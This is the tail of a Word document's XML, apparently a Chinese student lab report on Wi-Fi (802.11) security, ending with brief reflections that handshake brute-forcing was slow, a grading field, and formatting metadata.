        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>定期</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>强制更换</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>802.11协议有了更深刻的理解</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>化</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>书本知识</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实践</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F44370" w14:textId="0D227C17" w:rsidR="00267E95" w:rsidRDefault="002A08AF" w:rsidP="002E5A76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十</w:t>
      </w:r>
      <w:r w:rsidR="002E5A76" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、对本实验过程及方法、手段的改进建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF3187" w14:textId="1DD63A92" w:rsidR="00F23971" w:rsidRPr="00F96931" w:rsidRDefault="00524C9E" w:rsidP="002E5A76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>虽然</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>暴力破解的流程能够使我们了解四次</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>握手</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>信息交换</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>流程，但耗时过大</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>建议</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一个相对</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F84">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好</w:t>
      </w:r>
      <w:r w:rsidR="00F96931" w:rsidRPr="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191B41E" w14:textId="77777777" w:rsidR="005A1724" w:rsidRPr="00F15578" w:rsidRDefault="005A1724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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">报告评分：   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC8B68" w14:textId="5DE6C18F" w:rsidR="004E4A72" w:rsidRPr="003D6FB9" w:rsidRDefault="005A1724" w:rsidP="003D6FB9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  <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  指导教师签字：</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004E4A72" w:rsidRPr="003D6F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8FB87E" w14:textId="77777777" w:rsidR="00464DF2" w:rsidRDefault="00464DF2" w:rsidP="005A1724">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1513F4AA" w14:textId="77777777" w:rsidR="00464DF2" w:rsidRDefault="00464DF2" w:rsidP="005A1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方正舒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23AAD" w14:textId="77777777" w:rsidR="00464DF2" w:rsidRDefault="00464DF2" w:rsidP="005A1724">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="610DE486" w14:textId="77777777" w:rsidR="00464DF2" w:rsidRDefault="00464DF2" w:rsidP="005A1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7E6E2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65D8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDD4DA74"/>
    <w:lvl w:ilvl="0" w:tplc="ABFC55B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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D10924"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACB2D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282480"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE7A8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4A1585"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CB433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992A64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="144C1D9A"/>
    <w:lvl w:ilvl="0" w:tplc="2FC861D2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0E00D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C96F4EC"/>
    <w:lvl w:ilvl="0" w:tplc="558C30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B064DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34D402F2"/>
    <w:lvl w:ilvl="0" w:tplc="715AEB68">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1018" w:hanging="42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zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="884ADF36">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1018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zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D04ED568">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2888" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="962C9C44">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3822" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6E7E7A10">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4756" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4F943064">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5690" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C87E1A64">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6624" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C34CE698">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7558" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5B882F2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8492" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="48C31515"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D12E8CC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61CD4EB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A148456"/>
    <w:lvl w:ilvl="0" w:tplc="41549CB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1018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zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D0443F8A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1954" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="191EFA48">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2888" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3B56E628">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3822" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3E964F58">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4756" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7BFAC9FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5690" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="316084A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6624" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DD2A0D54">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7558" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A9B039EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8492" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A79538C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="811C733E"/>
    <w:lvl w:ilvl="0" w:tplc="ED22BF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 w:numId="9">
    <w:abstractNumId w:val="9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TQxMTI3MDMwszRX0lEKTi0uzszPAykwrAUALADbTSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="005A1724"/>
    <w:rsid w:val="00000635"/>
    <w:rsid w:val="00023642"/>
    <w:rsid w:val="0002704A"/>
    <w:rsid w:val="000477C3"/>
    <w:rsid w:val="000626E9"/>
    <w:rsid w:val="000C4E5A"/>
    <w:rsid w:val="000C6386"/>
    <w:rsid w:val="000F3743"/>
    <w:rsid w:val="00113D6B"/>
    <w:rsid w:val="001232FA"/>
    <w:rsid w:val="00137CBA"/>
    <w:rsid w:val="0015145C"/>
    <w:rsid w:val="00160B50"/>
    <w:rsid w:val="00166BDA"/>
    <w:rsid w:val="0017122D"/>
    <w:rsid w:val="001B5DB9"/>
    <w:rsid w:val="001B7088"/>
    <w:rsid w:val="001C7113"/>
    <w:rsid w:val="001E1F2D"/>
    <w:rsid w:val="0021368D"/>
    <w:rsid w:val="0021384C"/>
    <w:rsid w:val="0022468F"/>
    <w:rsid w:val="00227156"/>
    <w:rsid w:val="002310CA"/>
    <w:rsid w:val="00254276"/>
    <w:rsid w:val="00267E95"/>
    <w:rsid w:val="00271993"/>
    <w:rsid w:val="00275180"/>
    <w:rsid w:val="00280CFE"/>
    <w:rsid w:val="0028115E"/>
    <w:rsid w:val="002A08AF"/>
    <w:rsid w:val="002A7094"/>
    <w:rsid w:val="002B2CCE"/>
    <w:rsid w:val="002C07DE"/>
    <w:rsid w:val="002C4E68"/>
    <w:rsid w:val="002D0F7F"/>
    <w:rsid w:val="002E5A76"/>
    <w:rsid w:val="00301F01"/>
    <w:rsid w:val="00310D83"/>
    <w:rsid w:val="00321631"/>
    <w:rsid w:val="00340B9A"/>
    <w:rsid w:val="00352092"/>
    <w:rsid w:val="00397A71"/>
    <w:rsid w:val="003D418E"/>
    <w:rsid w:val="003D6FB9"/>
    <w:rsid w:val="003E5BFF"/>
    <w:rsid w:val="00417E6B"/>
    <w:rsid w:val="00431F55"/>
    <w:rsid w:val="00464DF2"/>
    <w:rsid w:val="004733BD"/>
    <w:rsid w:val="00494795"/>
    <w:rsid w:val="004B3A65"/>
    <w:rsid w:val="004D0A4F"/>
    <w:rsid w:val="004D78C6"/>
    <w:rsid w:val="004E4A72"/>
    <w:rsid w:val="004F641B"/>
    <w:rsid w:val="00507652"/>
    <w:rsid w:val="005128B0"/>
    <w:rsid w:val="00516753"/>
    <w:rsid w:val="00524C9E"/>
    <w:rsid w:val="005415B0"/>
    <w:rsid w:val="00542A5E"/>
    <w:rsid w:val="00592443"/>
    <w:rsid w:val="005A1724"/>
    <w:rsid w:val="005D70F8"/>
    <w:rsid w:val="005F172E"/>
    <w:rsid w:val="00603770"/>
    <w:rsid w:val="00635EF9"/>
    <w:rsid w:val="0063685F"/>
    <w:rsid w:val="006449F1"/>
    <w:rsid w:val="00663865"/>
    <w:rsid w:val="00663B2B"/>
    <w:rsid w:val="0069700D"/>
    <w:rsid w:val="006A3504"/>
    <w:rsid w:val="006B072E"/>
    <w:rsid w:val="006B0B02"/>
    <w:rsid w:val="006B737C"/>
    <w:rsid w:val="006F00B9"/>
    <w:rsid w:val="006F433E"/>
    <w:rsid w:val="00702CBA"/>
    <w:rsid w:val="00720581"/>
    <w:rsid w:val="00754468"/>
    <w:rsid w:val="007A5912"/>
    <w:rsid w:val="007B2EB8"/>
    <w:rsid w:val="007C285C"/>
    <w:rsid w:val="00805A32"/>
    <w:rsid w:val="00836544"/>
    <w:rsid w:val="00846B99"/>
    <w:rsid w:val="00875687"/>
    <w:rsid w:val="0087652B"/>
    <w:rsid w:val="0089520C"/>
    <w:rsid w:val="0089690E"/>
    <w:rsid w:val="008A3AD4"/>
    <w:rsid w:val="008B44CE"/>
    <w:rsid w:val="00942041"/>
    <w:rsid w:val="009501F0"/>
    <w:rsid w:val="00965FB8"/>
    <w:rsid w:val="0097676D"/>
    <w:rsid w:val="00976FA4"/>
    <w:rsid w:val="009A12F2"/>
    <w:rsid w:val="009D193B"/>
    <w:rsid w:val="009E263F"/>
    <w:rsid w:val="009E7B54"/>
    <w:rsid w:val="009F6EC4"/>
    <w:rsid w:val="00A01D93"/>
    <w:rsid w:val="00A05B22"/>
    <w:rsid w:val="00A073B0"/>
    <w:rsid w:val="00A078BE"/>
    <w:rsid w:val="00A567F6"/>
    <w:rsid w:val="00AB28AC"/>
    <w:rsid w:val="00AB31D0"/>
    <w:rsid w:val="00AC38F8"/>
    <w:rsid w:val="00AC5548"/>
    <w:rsid w:val="00AD19BE"/>
    <w:rsid w:val="00AD5315"/>
    <w:rsid w:val="00B21428"/>
    <w:rsid w:val="00B31FA3"/>
    <w:rsid w:val="00B51D75"/>
    <w:rsid w:val="00B80E1E"/>
    <w:rsid w:val="00BA151A"/>
    <w:rsid w:val="00BD13DE"/>
    <w:rsid w:val="00BD2845"/>
    <w:rsid w:val="00BD4EAF"/>
    <w:rsid w:val="00BF7DA7"/>
    <w:rsid w:val="00C07398"/>
    <w:rsid w:val="00C23243"/>
    <w:rsid w:val="00C25E0D"/>
    <w:rsid w:val="00C51568"/>
    <w:rsid w:val="00C90D82"/>
    <w:rsid w:val="00C92994"/>
    <w:rsid w:val="00CA506C"/>
    <w:rsid w:val="00CD27CC"/>
    <w:rsid w:val="00CD5264"/>
    <w:rsid w:val="00CE1998"/>
    <w:rsid w:val="00D21F46"/>
    <w:rsid w:val="00D423FC"/>
    <w:rsid w:val="00D71C62"/>
    <w:rsid w:val="00D74669"/>
    <w:rsid w:val="00DA60E2"/>
    <w:rsid w:val="00DB5F84"/>
    <w:rsid w:val="00DB6C49"/>
    <w:rsid w:val="00DC39A7"/>
    <w:rsid w:val="00DD22AB"/>
    <w:rsid w:val="00DF3AF4"/>
    <w:rsid w:val="00E20783"/>
    <w:rsid w:val="00E26D87"/>
    <w:rsid w:val="00E314F3"/>
    <w:rsid w:val="00E55E2E"/>
    <w:rsid w:val="00E76016"/>
    <w:rsid w:val="00EA6662"/>
    <w:rsid w:val="00EA7AFF"/>
    <w:rsid w:val="00EB243C"/>
    <w:rsid w:val="00EC62D5"/>
    <w:rsid w:val="00EF5281"/>
    <w:rsid w:val="00F101A5"/>
    <w:rsid w:val="00F15578"/>
    <w:rsid w:val="00F1566D"/>
    <w:rsid w:val="00F2246C"/>
    <w:rsid w:val="00F22FA9"/>
    <w:rsid w:val="00F23971"/>
    <w:rsid w:val="00F30E9D"/>
    <w:rsid w:val="00F741AC"/>
    <w:rsid w:val="00F74DCD"/>
    <w:rsid w:val="00F75663"/>
    <w:rsid w:val="00F808DE"/>
    <w:rsid w:val="00F96931"/>
    <w:rsid w:val="00FA3553"/>
    <w:rsid w:val="00FB3849"/>
    <w:rsid w:val="00FC2049"/>
    <w:rsid w:val="00FC60D2"/>
    <w:rsid w:val="00FE434C"/>
    <w:rsid w:val="00FF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8FF6C"/>
  <w15:docId w15:val="{1B909438-69FB-4A7C-9051-C2BB640F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172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BD13D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D13D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7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17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17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172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5A172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A1724"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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D13D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D13D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Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C07398"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C07398"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00EF5281"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FF023E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965FB8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rsid w:val="00965FB8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00DC39A7"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:val="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00DC39A7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00C515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667535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4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30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8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rgbClr val="E5E5E5"/>
        </a:solidFill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3</Pages>
  <Words>2221</Words>
  <Characters>12664</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>105</Lines>
  <Paragraphs>29</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Lenovo</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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root</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-24T00:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-28T04:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>